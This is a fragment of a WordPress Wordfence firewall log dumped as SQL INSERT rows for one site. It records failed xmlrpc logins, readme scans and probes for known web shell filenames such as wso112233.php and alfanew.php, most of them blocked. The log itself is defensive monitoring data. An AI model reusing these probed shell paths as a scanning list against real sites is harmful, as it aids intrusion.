(51729, 1712368238.429663, 1712368238.073500, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/mm-forms-community/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5; rv:86.0) Gecko/20100101 Firefox/86.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tbS1mb3Jtcy1jb21tdW5pdHkvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tbS1mb3Jtcy1jb21tdW5pdHkvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51763, 0.000000, 1712373294.571539, '\0\0\0\0\0\0\0\0\0\0ÿÿß²T…', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51762, 0.000000, 1712371768.559291, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜:¸½', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51746, 1712368245.247242, 1712368244.347200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/uploader/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.2.82', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy91cGxvYWRlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy91cGxvYWRlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(51764, 0.000000, 1712373464.673172, '\0\0\0\0\0\0\0\0\0\0ÿÿ|Ù^—', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51765, 0.000000, 1712374000.438537, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51766, 0.000000, 1712374997.624370, '\0\0\0\0\0\0\0\0\0\0ÿÿËsUŠ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51767, 0.000000, 1712375020.049146, '\0\0\0\0\0\0\0\0\0\0ÿÿuØmŸ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51768, 0.000000, 1712376297.834368, '\0\0\0\0\0\0\0\0\0\0ÿÿu÷â', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51769, 0.000000, 1712376414.555116, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51770, 0.000000, 1712378643.673160, '\0\0\0\0\0\0\0\0\0\0ÿÿtDe7', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51771, 0.000000, 1712378671.202519, '\0\0\0\0\0\0\0\0\0\0ÿÿÙ¥ú', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51772, 0.000000, 1712378723.666524, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+Y÷', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51773, 0.000000, 1712378834.017209, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51774, 0.000000, 1712378950.660966, '\0\0\0\0\0\0\0\0\0\0ÿÿgÿ‘F', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51775, 0.000000, 1712379535.737937, '\0\0\0\0\0\0\0\0\0\0ÿÿ}“', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51776, 0.000000, 1712380619.367437, '\0\0\0\0\0\0\0\0\0\0ÿÿuÙ§û', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51777, 1712381070.886433, 1712381070.509200, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(51778, 1712381068.852513, 1712381068.517200, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(51855, 0.000000, 1712464674.158626, '\0\0\0\0\0\0\0\0\0\0ÿÿ£5Ê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51815, 1712406464.689072, 1712406464.306300, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/RxRfiryf.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL1J4UmZpcnlmLnBocA==","category":"brute-force","ssl":1}'),
(51779, 1712381066.943608, 1712381066.612800, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(51854, 0.000000, 1712455062.949482, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ0ûæ', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51839, 1712425995.320676, 1712425994.716800, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wordpress/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51780, 1712381064.340978, 1712381064.028000, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(51781, 1712381062.318632, 1712381061.917400, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(50666, 1711731885.399525, 1711731885.067700, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/plugins/seoo/wsoyanz.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9wbHVnaW5zL3Nlb28vd3NveWFuei5waHA=","category":"brute-force","ssl":1}'),
(51363, 0.000000, 1712320301.933419, '\0\0\0\0\0\0\0\0\0\0ÿÿ&·DÒ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50973, 1712207437.080624, 1712207436.665400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/inc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luYy5waHA=","category":"brute-force","ssl":1}'),
(51862, 1712520721.889082, 1712520720.830200, '\0\0\0\0\0\0\0\0\0\0ÿÿÏöRê', 0, 200, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt', 'www.google.com', 'Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51874, 1712562416.368244, 1712562414.886200, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;$', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins/content/apismtp/apismtp.php.suspected?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==","category":"brute-force","ssl":1}'),
(52050, 1712761852.901165, 1712761852.572300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50877, 1712062402.772609, 1712062402.352900, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/updates.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(50882, 1712082374.349494, 1712082373.754500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
(50878, 1712062401.580993, 1712062400.922300, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/404.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"LzQwNC5waHA=","category":"brute-force","ssl":1}'),
(50270, 0.000000, 1711073603.246301, '\0\0\0\0\0\0\0\0\0\0ÿÿ+€,ó', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50664, 1711731888.533223, 1711731888.111900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///cache-compat.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vY2FjaGUtY29tcGF0LnBocA==","category":"brute-force","ssl":1}'),
(50669, 1711731881.050385, 1711731880.639400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-content/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtY29udGVudC9yZXBlYXRlci5waHA=","category":"brute-force","ssl":1}'),
(50294, 1711080792.137925, 1711080791.830900, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(50267, 0.000000, 1711073584.201059, '\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50268, 1711073587.793514, 1711073586.921400, '\0\0\0\0\0\0\0\0\0\0ÿÿŒîXS', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3htbHJwYy5waHA="}'),
(50904, 1712082615.277212, 1712082614.243900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(50871, 1712062411.279720, 1712062410.895600, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/blog.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jsb2cucGhw","category":"brute-force","ssl":1}'),
